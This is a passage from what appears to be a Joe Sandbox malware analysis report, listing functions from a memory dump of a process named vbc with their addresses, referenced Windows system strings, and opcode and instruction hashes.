                                                                                                                        • RtlpResUltimateFallbackInfo Enter, xrefs: 0533A2FB
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                                                        • API String ID: 0-2876891731
                                                                                                                        • Opcode ID: 3793a0416f48823464b46e7095f343b1fb3cbbe51813ae0f47b7c4b23ee60abd
                                                                                                                        • Instruction ID: fb6c9dc67389a6dce5a50fcafd81395fa6092dee4cc48169bae26c9cc3673953
                                                                                                                        • Opcode Fuzzy Hash: 3793a0416f48823464b46e7095f343b1fb3cbbe51813ae0f47b7c4b23ee60abd
                                                                                                                        • Instruction Fuzzy Hash: 18412174A08A44DBCB15CF99C881BAE77F5FF80310F1440A9E841DBAA0E3B4D900CB40
                                                                                                                        Function 05370FF6 Relevance: 2.6, Strings: 2, Instructions: 92COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        • \Registry\Machine\System\CurrentControlSet\Control, xrefs: 05371025
                                                                                                                        • @, xrefs: 05371050
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: @$\Registry\Machine\System\CurrentControlSet\Control
                                                                                                                        • API String ID: 0-2976085014
                                                                                                                        • Opcode ID: d177e4f8690c6a985755b77fd664bf36eed73bb0cbb44880e33e933c23246259
                                                                                                                        • Instruction ID: c7d3b1c1ce6fce1b97ceb1c92023358cb778517ae18bc015e94bedfd8bccf2d7
                                                                                                                        • Opcode Fuzzy Hash: d177e4f8690c6a985755b77fd664bf36eed73bb0cbb44880e33e933c23246259
                                                                                                                        • Instruction Fuzzy Hash: 5F316F72E0058CABDB22EBA5CC88F9FBBB9EB84750F000465E501A7250D7789D41CBA0
                                                                                                                        Function 0536A5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID: Cleanup Group$Threadpool!
                                                                                                                        • API String ID: 2994545307-4008356553
                                                                                                                        • Opcode ID: cc49adcc5f831561472364f0a61a0c08067f39659e8295086be77148c911f938
                                                                                                                        • Instruction ID: 66919b25e03b709346d9cc77b255d6783be5e3ad2a5d82688b95697504a0a095
                                                                                                                        • Opcode Fuzzy Hash: cc49adcc5f831561472364f0a61a0c08067f39659e8295086be77148c911f938
                                                                                                                        • Instruction Fuzzy Hash: 7201DCB2254744EFD321DF24CD4AB2677E8E744B15F01C939B558C7590EB34E804CB56
                                                                                                                        Function 0533C7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: MUI
                                                                                                                        • API String ID: 0-1339004836
                                                                                                                        • Opcode ID: a14159d09e39e9dbcb4903286c95ad5c645c8f7366ed6888af91291b782f47cd
                                                                                                                        • Instruction ID: 5a66098b70d67c748a26388a58c5ce575b91ab439399f64c7fc4a552d219a036
                                                                                                                        • Opcode Fuzzy Hash: a14159d09e39e9dbcb4903286c95ad5c645c8f7366ed6888af91291b782f47cd
                                                                                                                        • Instruction Fuzzy Hash: 4E827975E042188FDB24CFA9C882BEDB7B6BF48750F148569E81ABB350DB709D81CB50
                                                                                                                        Function 053CCC20 Relevance: 1.6, Strings: 1, Instructions: 353COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: w
                                                                                                                        • API String ID: 0-476252946
                                                                                                                        • Opcode ID: 5b2697ba0da01fb6dc51d80c295d9fe426fadc79d48b00298d7e6382c4852f5a
                                                                                                                        • Instruction ID: 8e18315c4d5a264990a4a0634897bc2c3435e21c2218e67cf9cdd8e8973ef5ed
                                                                                                                        • Opcode Fuzzy Hash: 5b2697ba0da01fb6dc51d80c295d9fe426fadc79d48b00298d7e6382c4852f5a
                                                                                                                        • Instruction Fuzzy Hash: E0D1AE30A04259ABDB24CF68C481ABEFFB2FF44700F14849DE8A997641E735ED92D750
                                                                                                                        Function 053D4C34 Relevance: 1.5, Strings: 1, Instructions: 271COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: @
                                                                                                                        • API String ID: 0-2766056989
                                                                                                                        • Opcode ID: 89f527b55bfe7a4f0811dd71fcfc3e06bd55def568a9094adf0b6a96f076d154
                                                                                                                        • Instruction ID: 04340acd2602790c448fdabc44d28ca3d9acfa873b98dd0e011737adbc1e3f1e
                                                                                                                        • Opcode Fuzzy Hash: 89f527b55bfe7a4f0811dd71fcfc3e06bd55def568a9094adf0b6a96f076d154
                                                                                                                        • Instruction Fuzzy Hash: 81A14CB2E0120AAFDF15DFA8D880FAEF7B9FF18740F144429E911A7251E7B49944CB60
                                                                                                                        Function 053B6420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 0-3916222277
                                                                                                                        • Opcode ID: ee69013039d54a5f660d8e6cdc4dc13a38ecb5f0ee1fef8a6115a5d84e1bf470
                                                                                                                        • Instruction ID: 0f7e5588472c72b6d4a0a558156a799c908075af332be0f78e01da9f83e64449
                                                                                                                        • Opcode Fuzzy Hash: ee69013039d54a5f660d8e6cdc4dc13a38ecb5f0ee1fef8a6115a5d84e1bf470
                                                                                                                        • Instruction Fuzzy Hash: B1914F72A41219ABEB21DF95CD85FEEB7B9EF08750F104065F701AB591D7B4AD00CBA0
                                                                                                                        Function 053DE10E Relevance: 1.5, Strings: 1, Instructions: 255COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 0-3916222277
                                                                                                                        • Opcode ID: 02c09a57811be0373750a2a30acb02949eeec476aad80fce54352a6c6134192f
                                                                                                                        • Instruction ID: 60c79e79dfea9970df8e8a1deee370831b1bdfadf19ade830ecb84ed96d10c9d
                                                                                                                        • Opcode Fuzzy Hash: 02c09a57811be0373750a2a30acb02949eeec476aad80fce54352a6c6134192f
                                                                                                                        • Instruction Fuzzy Hash: D2917072A00548ABDB22ABA5EC44FAFFFBEFF45750F100019F901AB250D7749945DB61
                                                                                                                        Function 0536A660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: GlobalTags
                                                                                                                        • API String ID: 0-1106856819
                                                                                                                        • Opcode ID: 276fd513696aa33f1ed482d9cd2ab1ed550e2b995d32f4fc515af875999e8b5a
                                                                                                                        • Instruction ID: c98fc9f83a9e6272b9b0e6445926f4515cb7a051f7475a8b5af24310be14b16d
                                                                                                                        • Opcode Fuzzy Hash: 276fd513696aa33f1ed482d9cd2ab1ed550e2b995d32f4fc515af875999e8b5a
                                                                                                                        • Instruction Fuzzy Hash: FE719176E0421ACFDF29CF98D591AEDBBB6FF48710F18812EE806A7240D7759841CB60
                                                                                                                        Function 0534E627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: EXT-
                                                                                                                        • API String ID: 0-1948896318
                                                                                                                        • Opcode ID: 2243919c1ee56b99cd02131fc601e5c4d563a0614f2b8af47508ac44ceac6b7d
                                                                                                                        • Instruction ID: f605bb8136045eb85efd6f0affaf12ef6e254a562bd65e991c98a7d52acb9d29
                                                                                                                        • Opcode Fuzzy Hash: 2243919c1ee56b99cd02131fc601e5c4d563a0614f2b8af47508ac44ceac6b7d
                                                                                                                        • Instruction Fuzzy Hash: 19415E72608311ABD720DA658984B6BBBECBF88724F440D29F985D7180E674E9049B97
                                                                                                                        Function 0532CDEA Relevance: 1.4, Strings: 1, Instructions: 138COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: AlternateCodePage
                                                                                                                        • API String ID: 0-3889302423
                                                                                                                        • Opcode ID: 88f7edda11874f2d14ad8d4debedf606a38e8096acbf660921059a1b2cf77b4b
                                                                                                                        • Instruction ID: 4a0613894ac6335e8db4f3ef2af884bf00ffcb327b98c661c0981390017111c0
                                                                                                                        • Opcode Fuzzy Hash: 88f7edda11874f2d14ad8d4debedf606a38e8096acbf660921059a1b2cf77b4b
                                                                                                                        • Instruction Fuzzy Hash: 1941C372E00618ABDF28EB98C884EFEB7F8FF44320F10415AE412E7250D7749A85CB50
                                                                                                                        Function 053AC730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: BinaryHash
                                                                                                                        • API String ID: 0-2202222882
                                                                                                                        • Opcode ID: 7485113f64c2e31b398fe7d0041475b45823615ddb9ee12d4b667628c2f3fa72
                                                                                                                        • Instruction ID: efa987300f9b9c8c4db3b2a76b6f97915bc0062432238d895adbf7363cfa25f7
                                                                                                                        • Opcode Fuzzy Hash: 7485113f64c2e31b398fe7d0041475b45823615ddb9ee12d4b667628c2f3fa72
                                                                                                                        • Instruction Fuzzy Hash: E44112B2D0162DAADB21DB50CC84FDEB77CEB45714F0045A5FA08AB140DB749E89CFA4
                                                                                                                        Function 053ACCA0 Relevance: 1.4, Strings: 1, Instructions: 108COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: TrustedInstaller
                                                                                                                        • API String ID: 0-565535830
                                                                                                                        • Opcode ID: d9b670d8d6d6e50e89abd0ef8b4fb0c3895bc547d9346efd0f3a1ff6ec42a857
                                                                                                                        • Instruction ID: a65833fac5e5c704ff35152e7a0afd4ed6a8016aba91e6b711f0ebd51ff079e8
                                                                                                                        • Opcode Fuzzy Hash: d9b670d8d6d6e50e89abd0ef8b4fb0c3895bc547d9346efd0f3a1ff6ec42a857
                                                                                                                        • Instruction Fuzzy Hash: DD317033A40659BFDF22ABA8CC45FEEBBB9EB44750F010169FA00AB150D6749E41CB90
                                                                                                                        Function 053D0F50 Relevance: 1.3, Strings: 1, Instructions: 99COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: @
                                                                                                                        • API String ID: 0-2766056989
                                                                                                                        • Opcode ID: 82e9b14cf91a5a6f37c9e4009f2ae5fbb7a03b243ebd8f8edba72d545418d4d2
                                                                                                                        • Instruction ID: 8ff096f78b63056d93317858c5882397ec679fddfb7df191459b597126ee1ac0
                                                                                                                        • Opcode Fuzzy Hash: 82e9b14cf91a5a6f37c9e4009f2ae5fbb7a03b243ebd8f8edba72d545418d4d2
                                                                                                                        • Instruction Fuzzy Hash: 4F317272518345AFD315DF14C849E5BFBE8FF84750F404A2DB59483190E7B4E908CBA2
                                                                                                                        Function 05358CB1 Relevance: 1.3, Strings: 1, Instructions: 85COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: WindowsExcludedProcs
                                                                                                                        • API String ID: 0-3583428290
                                                                                                                        • Opcode ID: 34a5547e051765790c2c8ceff76a078c61e809f66b40f98c98d16d0ff40d25f6
                                                                                                                        • Instruction ID: 93991527c9c25934f6cbd70c5cfe8b51e98070d38826e00f0a321a46dc421161
                                                                                                                        • Opcode Fuzzy Hash: 34a5547e051765790c2c8ceff76a078c61e809f66b40f98c98d16d0ff40d25f6
                                                                                                                        • Instruction Fuzzy Hash: 87210477A01118ABCF22DA98C844F6BF7FEFF51AA0F254422BD16AF114D674DD008BA0
                                                                                                                        Function 053E6FF7 Relevance: 1.3, Strings: 1, Instructions: 47COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        • Critical error detected %lx, xrefs: 053E7027
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: Critical error detected %lx
                                                                                                                        • API String ID: 0-802127002
                                                                                                                        • Opcode ID: 637ea50401c445ecf4fc01e5f9820591a3fd1072836d0bde0002f955bb55b3f7
                                                                                                                        • Instruction ID: 5ac9d6942899d357db003f4fb1ee8487566ba0872f9afe63ce11d9540dc05c45
                                                                                                                        • Opcode Fuzzy Hash: 637ea50401c445ecf4fc01e5f9820591a3fd1072836d0bde0002f955bb55b3f7
                                                                                                                        • Instruction Fuzzy Hash: 3D113976E043888BEB26DFA8D805BEDFBF1EB04718F20412AD165AB282E7751901CF14
                                                                                                                        Function 053D2000 Relevance: .8, Instructions: 757COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 50efc69b10880fbca73f4f9d974c84e2dcca0b179d3355f6e1112c9f606c2454
                                                                                                                        • Instruction ID: 21c2831c1d729abad159b11b652b62203026f5bfdca685f97da660c7cb923179
                                                                                                                        • Opcode Fuzzy Hash: 50efc69b10880fbca73f4f9d974c84e2dcca0b179d3355f6e1112c9f606c2454
                                                                                                                        • Instruction Fuzzy Hash: 4642AD3BA083419BDB25CF64D890A7BF7F6BF88300F48492DF99697250D6B1D845CB62
                                                                                                                        Function 053C8158 Relevance: .6, Instructions: 617COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 15ea89416decd449cbc7f2919ce43bbf8c7038f855a687997a76c1552244eafa
                                                                                                                        • Instruction ID: 59300255d18dedbeb214e3e112197068c112acdc8738bdd86312b239280a21df
                                                                                                                        • Opcode Fuzzy Hash: 15ea89416decd449cbc7f2919ce43bbf8c7038f855a687997a76c1552244eafa
                                                                                                                        • Instruction Fuzzy Hash: 60424975A002199FDB25CF69C881BADFBF6BF48310F14809DE949AB241DB74AE81CF50
                                                                                                                        Function 053DA118 Relevance: .6, Instructions: 591COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 0cdcdb453c43de235d93e8bb972b597ae6301696a74007bc115f52dd6d5b2ae4
                                                                                                                        • Instruction ID: db3de11454b5ed348966f4f0904edac35d44ed6d98f502734baa25390c821678
                                                                                                                        • Opcode Fuzzy Hash: 0cdcdb453c43de235d93e8bb972b597ae6301696a74007bc115f52dd6d5b2ae4
                                                                                                                        • Instruction Fuzzy Hash: C122DE722086518BDB25CF29E294772F7F2BF44300F08845AE8978FA85D7B5E592CB70
                                                                                                                        Function 05358DBF Relevance: .6, Instructions: 554COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 63e46f8f421e0fc1e88e33df71baf68327207b4a3f2334d825c7577a24c3b7a2
                                                                                                                        • Instruction ID: 82f1bc04f95e903d2de882776b7df8cb0f76507027fb3922bedb567b086b2956
                                                                                                                        • Opcode Fuzzy Hash: 63e46f8f421e0fc1e88e33df71baf68327207b4a3f2334d825c7577a24c3b7a2
                                                                                                                        • Instruction Fuzzy Hash: C7225FB1E0411ADBCF19CF95C481ABEFBF6BF48314B24846AE845AB241E774DD91CB60
                                                                                                                        Function 053365D0 Relevance: .4, Instructions: 383COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 94991c3eac156a8075fbcab22af53c7756b8e0ca44b1dff926b700b5b173d28b
                                                                                                                        • Instruction ID: ad66122ab40f5a6965cc16e1a0878685742ec12918da8e884380d0213fa4e909
                                                                                                                        • Opcode Fuzzy Hash: 94991c3eac156a8075fbcab22af53c7756b8e0ca44b1dff926b700b5b173d28b
                                                                                                                        • Instruction Fuzzy Hash: 4FE1B171608341DFC714CF28C092A6ABBE1FF89304F458A6DF8959B351DB71E905CB92
                                                                                                                        Function 05328397 Relevance: .4, Instructions: 380COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: bbb522e3637da79de462f126b1ac297b4278222d3d4833141a20dce91608ea45
                                                                                                                        • Instruction ID: 5edfbfdb215cad8359ccbfb7a328d53daa830b76f48cfcbfd4aa7cf0ff13881c
                                                                                                                        • Opcode Fuzzy Hash: bbb522e3637da79de462f126b1ac297b4278222d3d4833141a20dce91608ea45
                                                                                                                        • Instruction Fuzzy Hash: 9AD1F471B00B26DBCB18DF68C890FBAF3A6BF44304F144629E956DB680E774E945CB50
                                                                                                                        Function 053C6E20 Relevance: .4, Instructions: 379COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 41d231a67cff45e6fbc5c52bf001e4369546e146738928e74ccfa52fc06a983b
                                                                                                                        • Instruction ID: ab38974c85dc19d1a9fc90f5e90a386562f585e77ca09572385558e1f2763e56
                                                                                                                        • Opcode Fuzzy Hash: 41d231a67cff45e6fbc5c52bf001e4369546e146738928e74ccfa52fc06a983b
                                                                                                                        • Instruction Fuzzy Hash: 08E11870E042599BCF14CFA8C981ABEBBF6FF49244F14819EE845AB241E375DD45CBA0
                                                                                                                        Function 0535EF28 Relevance: .3, Instructions: 347COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: e93c0c45a03da8942742ec3407bc4ff6bf38432546224364b1f966b4dd35be73
                                                                                                                        • Instruction ID: f0e61647209711f93e9374d662a5490d609f395ecee70c796644f6a9a1e1cec1
                                                                                                                        • Opcode Fuzzy Hash: e93c0c45a03da8942742ec3407bc4ff6bf38432546224364b1f966b4dd35be73
                                                                                                                        • Instruction Fuzzy Hash: ABE124B4D00608DFCF25CFA9C984AADBBF6FF48324F14556AE946A7660DB70A941CF10
                                                                                                                        Function 0534CFE0 Relevance: .3, Instructions: 345COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 4ed8cf8bfc81e5de5fc0893b9f22964373f88d17a2b3c9a7f3f775396a6404b3
                                                                                                                        • Instruction ID: 0e6e93b5915d62e70bdf2971525d619719984bf5ab4b58b95958ddd976edab7e
                                                                                                                        • Opcode Fuzzy Hash: 4ed8cf8bfc81e5de5fc0893b9f22964373f88d17a2b3c9a7f3f775396a6404b3
                                                                                                                        • Instruction Fuzzy Hash: 3CD1D430B043298FEB75CB55C894BAAB7F6BB45300F4448E9D90AAB241DBB4BD85CF51
                                                                                                                        Function 053B8243 Relevance: .3, Instructions: 322COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                                                                        • Instruction ID: 7add00917385840b8a108e16bad05d0f8dc40ed169527ca9120e66a7b424e8ac
                                                                                                                        • Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                                                                        • Instruction Fuzzy Hash: C3B14F74B00604AFEF24DB95C944EEBF7BEBF84304F14446DAA429BB94DAB4E945CB10
                                                                                                                        Function 05340535 Relevance: .3, Instructions: 300COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                                                                        • Instruction ID: 7d0d29adad233f109b705e98c044994148dafa3ed217c127a832a1f9b773a0a8
                                                                                                                        • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                                                                        • Instruction Fuzzy Hash: B9B1F171708645AFDF29DBA8C848BBEBBFAFF44200F140599D6529B281DB70E941CF90
                                                                                                                        Function 05350DE1 Relevance: .3, Instructions: 295COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, Offset: 05300000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_5300000_vbc.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 47dbf6b8a8eedf23e7c07262d17334ec7c908fcab1fb71ec159192e1ce5f8f81
                                                                                                                        • Instruction ID: defc9c5aabfb2b0ea0ada704c17e9c7a3b3f2fe4a8d3f2e81a37772b48d7c4fd
